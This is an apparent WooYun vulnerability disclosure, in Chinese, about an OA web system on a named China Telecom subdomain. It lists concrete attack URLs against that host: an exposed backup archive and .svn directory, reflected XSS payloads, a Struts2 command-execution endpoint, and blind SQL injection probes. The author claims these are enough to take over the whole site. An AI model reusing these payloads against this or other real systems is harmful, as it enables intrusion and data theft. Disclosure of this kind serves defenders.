WooYun.org

漏洞1：备份文件泄露。
http://oa.ctrl.189.cn/web/web.rar
漏洞2：web目录下svn信息泄露，拿下源码。
http://oa.ctrl.189.cn/web/.svn/entries 等等

漏洞3：反射型xss（意义不大，但也算是洞洞吧）
http://oa.ctrl.189.cn/web/brightsm/leaderviewpages/eventSourceDig.jsp?flag=1&series=null_</script><script>alert('xxs')</script>
/web/brightsm/leaderviewpages/incidentDig.jsp?flag=1&series=null_</script><script>alert('xxs')</script>
等等
漏洞4：structs2命令执行.
http://oa.ctrl.189.cn/web/wfconfig/addConfigActivityInput.action

漏洞5：sql注入（盲注）
http://oa.ctrl.189.cn/web/wfconfig/enrollConfigProcessMainInput.action?identify=&mainTable=IPTWF_CT_SHOPOPENING_MAIN'/**/AND/**/'1'%3d'1
http://oa.ctrl.189.cn/web/wfconfig/enrollConfigProcessMainInput.action?identify=&mainTable=IPTWF_CT_SHOPOPENING_MAIN'/**/AND/**/'1'%3d'2
此服务器经常出现问题，有时会出现tomcat环境错误，正常时可盲注。
刚好遇到tomcat环境错误，无法贴图。
还有多个页面没有限制权限，泄露一些信息，但上面的几个问题，已经可以拿下整个站，此处泄露微不足道，就不贴上来了